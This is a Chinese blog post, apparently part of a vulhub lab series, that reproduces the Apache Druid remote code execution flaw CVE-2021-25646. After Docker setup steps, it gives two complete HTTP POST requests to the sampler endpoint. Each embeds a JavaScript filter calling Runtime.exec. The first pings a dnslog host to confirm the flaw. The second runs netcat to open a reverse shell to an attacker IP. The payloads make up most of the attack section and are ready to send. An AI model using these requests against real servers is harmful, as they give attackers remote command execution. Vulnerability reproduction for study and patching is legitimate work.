Apache Druid 远程代码执行漏洞（ CVE-2021-25646）

最新推荐文章于 2024-07-24 10:54:09 发布

没有名字的名字的名字的名字

最新推荐文章于 2024-07-24 10:54:09 发布

阅读量612

点赞数

分类专栏： vulhub 文章标签： apache web安全

本文链接：https://blog.csdn.net/m0_55654781/article/details/127114054

版权

vulhub 专栏收录该内容

24 篇文章 0 订阅

订阅专栏

描述 Apache Druid 包括执行用户提供的 JavaScript 的功能嵌入在各种类型请求中的代码，此功能在用于高信任度环境中，默认已被禁用。但是，在 Druid 0.20.0 及更低版本中，经过身份验证的用户可以构造传入的json串来控制一些敏感的参数发送恶意请求，利用 Apache Druid 漏洞可以执行任意代码。

环境配置

kali 环境配置

安装https协议、CA证书、dirmngr

apt-get update

apt-get install -y apt-transport-https ca-certificates

apt-get install dirmngr

添加GPG密钥并添加更新源

curl -fsSL https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/gpg | sudo apt-key add -

echo 'deb Index of /docker-ce/linux/debian/ | 清华大学开源软件镜像站 | Tsinghua Open Source Mirror buster stable' | sudo tee /etc/apt/sources.list.d/docker.list

系统更新以及安装docker

apt-get update&&apt install docker-ce

启动docker服务器和compose

service docker start || apt install docker-compose

访问网址 192.168.1.12:8888

点击Load data -> Local disk

依次填入 Base directory: quickstart/tutorial File filter: wikiticker-2015-09-12-sampled.json.gz

默认点击next 直到fiflter之前开启代理

漏洞验证（dnslog）

POST /druid/indexer/v1/sampler HTTP/1.1

Host: 192.168.191.128:8888

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0

Accept: application/json, text/plain, /

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Content-Type: application/json

Content-Length: 1002

Connection: close

{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{"isRobot":true,"channel":"#x","timestamp":"2021-2-1T14:12:24.050Z","flags":"x","isUnpatrolled":false,"page":"1","diffUrl":"https://xxx.com","added":1,"comment":"Botskapande Indonesien omdirigering","commentLength":35,"isNew":true,"isMinor":false,"delta":31,"isAnonymous":true,"user":"Lsjbot","deltaBucket":0,"deleted":0,"namespace":"Main"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('ping -c 4 fq3myc.dnslog.cn')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}

burp抓包

dnslog 验证结果

漏洞利用（nc 反弹shell）

POST /druid/indexer/v1/sampler HTTP/1.1

Host: 192.168.191.128:8888

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0

Accept: application/json, text/plain, /

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Content-Type: application/json

Content-Length: 1005

Connection: close

{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{"isRobot":true,"channel":"#x","timestamp":"2021-2-1T14:12:24.050Z","flags":"x","isUnpatrolled":false,"page":"1","diffUrl":"https://xxx.com","added":1,"comment":"Botskapande Indonesien omdirigering","commentLength":35,"isNew":true,"isMinor":false,"delta":31,"isAnonymous":true,"user":"Lsjbot","deltaBucket":0,"deleted":0,"namespace":"Main"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('nc 192.168.1.12 7777 -e /bin/sh')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}